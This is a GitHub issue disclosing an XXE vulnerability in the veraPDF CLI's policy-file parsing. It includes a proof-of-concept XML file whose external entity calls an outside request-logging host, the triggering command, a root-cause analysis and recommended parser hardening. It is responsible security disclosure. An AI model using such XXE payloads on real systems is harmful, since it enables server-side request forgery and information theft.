Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Potential XXE(XML External Entity Injection) vulnerability in veraPDFCli #1488

Open
JAckLosingHeart opened this issue Nov 3, 2024 · 1 comment
Assignees
Milestone

Comments

@JAckLosingHeart
Copy link

JAckLosingHeart commented Nov 3, 2024

Hi team,

A malicious policyfile in XML passed to veraPDF CLI can lead to a XXE vulnerability exploitation due to insecure use of XML parser. The policyfile be the attack payload, which is similar to previously fixed issue #1415, but this vulnerability happens at a different place within CLI tool even before the XSL transformation happens.

### POC
Installed the latest veraPDF, installer downloaded from the website:

PS C:\Users\samym\Documents\verapdf-poc> verapdf --version
veraPDF 1.26.2
Built: Sun May 19 13:33:00 CST 2024
Developed and released by the veraPDF Consortium.
Funded by the PREFORMA project.
Released under the GNU General Public License v3
and the Mozilla Public License v2 or later.

malicious policyfile which doesn't have to be a xsl file to be parsed, poc.xml:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://eo9k3koijwh1jvr.m.pipedream.net/poc">]>
<root>&xxe;</root>

https://eo9k3koijwh1jvr.m.pipedream.net is a malicious website I set up to log incoming request for demo purpose only

And prepare a pdf whatever named test.pdf
Execute:

PS C:\Users\samym\Documents\verapdf-poc> verapdf --policyfile .\poc.xml .\test.pdf
Exception in thread "main" org.verapdf.core.VeraPDFException: Policy file extension must be one of sch, xsl, or xslt
        at org.verapdf.policy.PolicyChecker.applyPolicy(PolicyChecker.java:125)
        at org.verapdf.cli.VeraPdfCliProcessor.applyPolicy(VeraPdfCliProcessor.java:247)
        at org.verapdf.cli.VeraPdfCliProcessor.processPaths(VeraPdfCliProcessor.java:107)
        at org.verapdf.cli.VeraPdfCli.singleThreadProcess(VeraPdfCli.java:142)
        at org.verapdf.cli.VeraPdfCli.main(VeraPdfCli.java:111)
        at org.verapdf.apps.GreenfieldCliWrapper.main(GreenfieldCliWrapper.java:54)

Though there was a exception when applying policy, vulnerability can be still triggered even before that
Could see the request came in on my request bin anyway:
image

This vulnerability could be further exploited and lead to information leak, SSRF and possibly RCE

### Root cause analysis:
The problem is actually inside function mergeEnabledFeaturesFromPolicy under org.verapdf.apps.utils.ApplicationUtils:
https://github.com/veraPDF/veraPDF-apps/blob/v1.27.88/gui/src/main/java/org/verapdf/apps/utils/ApplicationUtils.java#L171
image
The policyfile is parsed without secure settings on or external entities disabled, which finally leads to a XXE vulnerability. Also, this function is not only used by veraPDFCli, but used in other places as well, which means there could be more attack surface

### Recommendations:
Enable secure processing of XML files
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
Disable all external entities

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
@MaximPlusov MaximPlusov self-assigned this Nov 3, 2024
@MaximPlusov MaximPlusov added this to the 1.28 milestone Nov 5, 2024
@JAckLosingHeart
Copy link
Author

Hi team! Thank you for addressing and fixing the security issue I reported. To help other users identify and understand the implications of this fix, could we consider requesting a CVE number for this vulnerability? This would make it easier for users to track and assess any related security concerns.

# for free to join this conversation on GitHub. Already have an account? # to comment
Projects
None yet
Development

No branches or pull requests

2 participants